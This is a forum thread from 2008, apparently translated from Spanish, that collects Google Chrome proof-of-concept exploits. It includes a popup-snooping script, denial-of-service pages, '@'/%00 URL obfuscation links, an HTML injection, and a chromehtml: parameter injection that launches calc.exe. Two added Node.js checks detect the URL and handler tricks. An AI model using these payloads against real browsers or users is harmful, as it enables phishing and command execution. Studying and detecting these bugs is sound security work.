Compilation of Bugs/Exploits in Google Chrome win32

Started by WHK, 3 September 2008, 00:45 AM


MabUse

<script>
var snoopWin;

function run() {
  // Open a popup whose URL carries "www.gmail.com" in the userinfo part;
  // the host actually loaded is foro.elhacker.net (the text after "@").
  snoopWin = window.open('http://www.gmail.com@foro.elhacker.net/', 'snoopWindow', 'width=640,height=480');
  snoopWin.blur();
  setTimeout(snoopy, 1000);
}

function snoopy() {
  // Report the popup's current location, then re-arm every 100 ms.
  alert(snoopWin.location);
  setTimeout(snoopy, 100);
}
</script>



<a href="javascript:run();">http://www.google.com/</a>


But, if:

<script>
var snoopWin;

function run() {
  // Same popup as above: "www.gmail.com" is userinfo, foro.elhacker.net is the host.
  snoopWin = window.open('http://www.gmail.com@foro.elhacker.net/', 'snoopWindow', 'width=640,height=480');
  snoopWin.blur();
  setTimeout(snoopy, 1000);
}

function snoopy() {
  // Only difference from the first version: the location is re-read every 1000 ms.
  alert(snoopWin.location);
  setTimeout(snoopy, 1000);
}
</script>



<a href="javascript:run();">http://www.google.com/</a>

berz3k


Portal dedicated to Chrome vulnerabilities:


Google Chrome Silent Crash Exploit
Google Chrome Inspect Element DoS Exploit
Google Chrome Buffer Overflow
Google Chrome Invalid URL Crash
Google Chrome Omnibox Keylogger
Google Chrome Comic Book
Uninstalling Chrome - Is it something we said.
Google Chrome Carpet Bombing Vulnerability
Chrome Keyboard Shortcuts
Chrome Easter Eggs
Google Chrome Released


The comics are very funny, and so are the Chrome Easter Eggs; like every program it hides the credits and other surprises, but also information that is valuable to an attacker:


about:internets
about:version
about:stats
about:memory
about:plugins
about:histograms
about:cache
about:dns
about:network
about:crash
about:hang (can crash your browser)
about:% (can crash your browser)


I found it quite good to run "about:memory" and see how much memory Firefox consumes compared to Chrome.

source: http://chromekb.com

-berz3k.






WHK

#32
The site looks good.

http://chromekb.com/vulnerabilities/"><h1>ARREGLENMEE!</h1>






source:
http://www.jccharry.com/fake/1.txt

berz3k

#33
Google fixes vulnerabilities in its Chrome browser

Google Releases New Browser Chrome - Vulnerabilities on First Day

So as most of you probably know the big buzz on the Internet last week was that Google (after supporting Firefox for so long) have actually launched their own browser.

It's called Google Chrome. Now of course in typical Google fashion they call it BETA software, and a number of flaws have popped up during the first couple of days of release.

One cool thing though is that each tab runs its own threaded process, so if one tab bombs out it won't take down your whole browser.

The browser is a move for Google into the online/offline integration they started with Google Desktop; there are more and more online apps (Google Office) that people still want to use offline, and with a Google-made browser this will be possible.

You also have to consider the privacy implications though, if you are also using Gmail...Google will basically know everything you do, even worse if you also use Google Desktop they will know what you have on your computer, what e-mail you send and receive and what you surf on the web.


Curious video in which German citizens won't be using Chrome; I forgot to post it earlier:

http://valleywag.com/5046665/german-government-tells-citizens-not-to-use-google-chrome

We'll have to test what's new in Chrome.

-berz3k.




berz3k

New exploit on milw0rm

Affected versions

Chrome/0.2.149.29
Chrome/0.2.149.30




<html>
<head>
<title>Google Chrome Carriage Return Null Object Memory Exhaustion Remote DoS.</title>
<script type="text/javascript">
// PoC body as published: open a window on a CR/LF-only URL, twice.
window.open("\r\n\r\n");
// Note: window.refresh() is not a standard DOM method; in a conforming engine
// this call throws a TypeError and the second window.open() below never runs.
window.refresh();
window.open("\r\n\r\n");
</script>
</head>

<body><br><br>
<h2><center>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Denial of Service.<br><br>Proof of Concept</center></h2>

<center>
<b>Note: Keep an eye on the memory consumption in Task Manager.</b><br><br>

<hr>
<b>This POC has been designed with minimum object usage. This can be made more critical when combined with a number of objects. For example:
using the alert function will make it more exhaustive.</b><br><br>

<b><br>Aditya K Sood<br> (c) SecNiche Security.<br><a href="http://www.secniche.org">http://www.secniche.org</a></b>
<hr></center>
<b>Version Tested:<br><br>Official Build 1798<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br> AppleWebKit/525.13 (KHTML, like Gecko)<br> Chrome/0.2.149.29 Safari/525.13
<br><br>

Official Build 2200<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) <br>AppleWebKit/525.13 (KHTML, like Gecko) <br>Chrome/0.2.149.30 Safari/525.13
</b>
<hr>
</body>
</html>



-berz3k.


berz3k

#35
Affected versions

Chrome/0.2.149.30
Chrome/0.2.149.29
Chrome/0.2.149.27


source: http://www.milw0rm.com/exploits/6609

Remote DoS Exploit


<html>
<head>
<title>Google Chrome Window Object Suppressing Remote Denial of Service.</title>
</head>


<body onLoad="window.close();">
<center>
<b>Note: Design Flaw. Zero Security Check. Script Can Be Used to Kill Parent Window Directly, Leading to Denial of Service.</b><br><br>
</center>
</body>
</html>

berz3k


Google Chrome MetaCharacter URI Obfuscation Vulnerability

Google Chrome is vulnerable to a URI obfuscation vulnerability. An attacker can easily perform malicious redirection by manipulating the browser functionality. The link can not be traversed properly in the status/address bar. This could facilitate the impersonation of legitimate web sites in order to steal sensitive information from unsuspecting users. A URI specified with the @ character, with or without a NULL character, causes the vulnerability.

Vulnerable Systems:
* Chrome version 0.2.149.30
* Chrome version 0.2.149.29
* Chrome version 0.2.149.27

Proof of Concept:

Link1: ftp://anoymous:guest@microsoft.com
Link2: [Without NULL] | http://www.google.com@yahoo.com | [Google --> Yahoo [Obfuscation]]

Link3: http://www.secniche.org%00@www.milw0rm.com [With NULL] SecNiche --> Milw0rm [Obfuscation]

source:
http://www.secniche.org/gcuri/index.html

-berz3k.
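MabUse's snoop popup at the top of the thread (http://www.gmail.com@foro.elhacker.net/) and the three links in the SecNiche advisory above all lean on the same parsing rule: everything before "@" is userinfo (credentials), and the real host is what follows it. As an added example, not part of the thread, the advisory, or Chrome, here is a small Node.js check built on the built-in WHATWG URL class that reports the host the browser will actually connect to and flags decoy userinfo, including a percent-encoded NULL. The sample list is constructed from the PoC links above plus one clean URL; the function name and report fields are my own.

```javascript
// Added example (not from the thread): flag URLs that use the userinfo "@"
// trick, where text before "@" looks like a host but the browser actually
// connects to the host after it.

const CONTROL_CHARS = /[\u0000-\u001f\u007f]/;

// Inspect one URL string. Returns:
//   ok       - true when the URL parsed and carries no userinfo
//   realHost - host the browser would really connect to (null if unparseable)
//   decoy    - percent-decoded userinfo a reader might mistake for the host
//   reasons  - why the URL was flagged (empty when ok)
function inspectUrl(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch (e) {
    return { ok: false, realHost: null, decoy: '', reasons: ['unparseable URL'] };
  }
  const reasons = [];
  // WHATWG parsing keeps percent-escapes in userinfo, so decode for inspection.
  let decoy = url.username;
  try { decoy = decodeURIComponent(url.username); } catch (e) { /* keep raw */ }

  if (url.username !== '' || url.password !== '') {
    reasons.push('userinfo present: text before "@" is not the host');
  }
  // A userinfo containing a dot is the classic www.google.com@yahoo.com decoy.
  if (/\./.test(decoy)) {
    reasons.push('userinfo "' + decoy.replace(CONTROL_CHARS, '?') + '" looks like a hostname');
  }
  if (CONTROL_CHARS.test(decoy)) {
    reasons.push('userinfo contains a control character (e.g. %00) that may truncate what is displayed');
  }
  return { ok: reasons.length === 0, realHost: url.hostname, decoy, reasons };
}

// Constructed sample inputs: the PoC links from the thread plus one clean URL.
const SAMPLES = [
  'ftp://anoymous:guest@microsoft.com',
  'http://www.google.com@yahoo.com',
  'http://www.secniche.org%00@www.milw0rm.com',
  'http://www.gmail.com@foro.elhacker.net/',
  'https://www.google.com/search?q=chrome',
];

function inspectAll(samples) {
  return (samples || SAMPLES).map(function (s) {
    return Object.assign({ url: s }, inspectUrl(s));
  });
}

// Stand-alone run: print a one-line verdict per sample with the real host.
inspectAll().forEach(function (r) {
  console.log((r.ok ? 'OK   ' : 'FLAG ') + r.url);
  console.log('      real host: ' + r.realHost);
  r.reasons.forEach(function (why) { console.log('      - ' + why); });
});
```

Any URL that ends up in a rendered link or a status bar can be run through inspectUrl first; a non-empty reasons list is a good trigger for showing the real host explicitly, which is exactly the information the obfuscated links above are designed to hide.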


berz3k

New exploit 23.12.2008

Vulnerable Systems:
* Chrome version 1.0.154.36

Google Chrome Browser (ChromeHTML://) Remote Parameter Injection
source: http://www.milw0rm.com


<!--
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html

click the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>


Doesn't work on:
Windows Vista SP1; can someone confirm the bug on XP SP3 with a PoC






-berz3k.
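The PoC above works because the registered handler's command line is built by textual substitution of the URL, so an embedded double quote ends the quoted argument and whatever follows is parsed as additional switches. As an added example, not from the thread, the PoC authors, or Chromium, this Node.js check percent-decodes a chromehtml: payload and reports the quote, whitespace and switch-like tokens that an application registering such a handler should reject before the value ever reaches a command line. The function name and report fields are my own; the sample payload is the one quoted above.

```javascript
// Added example (not from the thread or Chromium): detect protocol-handler
// payloads that could break out of a quoted "%1" argument and smuggle
// command-line switches, as in the chromehtml: PoC above.

const HANDLER_SCHEME = 'chromehtml:';

// Analyse one href. Returns:
//   handled          - true when the href targets the chromehtml: handler
//   safe             - true when nothing in the decoded payload could alter the command line
//   decoded          - percent-decoded payload (null if not handled or malformed)
//   smuggledSwitches - tokens that look like --switches after a quote or whitespace
//   reasons          - why the payload was rejected (empty when safe)
function analyzeHandlerPayload(href) {
  if (!href.toLowerCase().startsWith(HANDLER_SCHEME)) {
    return { handled: false, safe: true, decoded: null, smuggledSwitches: [], reasons: [] };
  }
  let decoded;
  try {
    decoded = decodeURIComponent(href.slice(HANDLER_SCHEME.length));
  } catch (e) {
    return { handled: true, safe: false, decoded: null, smuggledSwitches: [],
             reasons: ['malformed percent-encoding'] };
  }
  const reasons = [];
  if (decoded.indexOf('"') !== -1) {
    reasons.push('double quote can terminate the quoted "%1" argument');
  }
  if (/\s/.test(decoded)) {
    reasons.push('whitespace would split the value into extra tokens');
  }
  // Switch-like tokens (--name or --name=value) that follow a quote or whitespace.
  const smuggledSwitches = [];
  const re = /(?:^|[\s"])(--[A-Za-z0-9-]*)/g;
  let m;
  while ((m = re.exec(decoded)) !== null) {
    smuggledSwitches.push(m[1]);
  }
  if (smuggledSwitches.length > 0) {
    reasons.push('switch-like tokens found: ' + smuggledSwitches.join(', '));
  }
  return { handled: true, safe: reasons.length === 0, decoded, smuggledSwitches, reasons };
}

// Constructed samples: the PoC link from the thread, a clean handler URL and an unrelated href.
const HANDLER_SAMPLES = [
  'chromehtml:www.google.com"%20--renderer-path="c:\\windows\\system32\\calc.exe"%20--"',
  'chromehtml:www.google.com/search?q=test',
  'http://www.google.com/',
];

// Stand-alone run: print the verdict for each sample.
HANDLER_SAMPLES.forEach(function (href) {
  const r = analyzeHandlerPayload(href);
  const verdict = !r.handled ? 'SKIP ' : (r.safe ? 'OK   ' : 'REJECT ');
  console.log(verdict + href);
  r.reasons.forEach(function (why) { console.log('      - ' + why); });
});
```

The defensive point is the order of operations: decode first, then inspect, because the quote and the spaces in the PoC arrive percent-encoded and only become command-line metacharacters after the handler expands them. A handler that passes the value as a single argv element instead of substituting it into a command string removes the problem at the root; the check above is the detection side for cases where that is not under your control.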



Novlucker

Well, good thing berz3k posted a few days ago, so I avoid having to revive an old thread :xD

Curiosity: has anyone "played" with the final/stable version of Chrome and the bugs collected in this thread?
I'd like to know whether Google has fixed anything or these errors remain :rolleyes: ; otherwise I'll have to test it myself :xD

Regards
Help keep the forum clean, report the "lost causes" to a MOD XD

"There are two infinite things: the Universe and human stupidity. And I'm not so sure about the first."
Albert Einstein

berz3k

@Novlucker

The vast majority are fixed (I have played with all of them), except this last one, which I tested on Vista; well, I know it's a bug that affects XP SP3, I'll have to revive my old laptop :D.

-berz3k.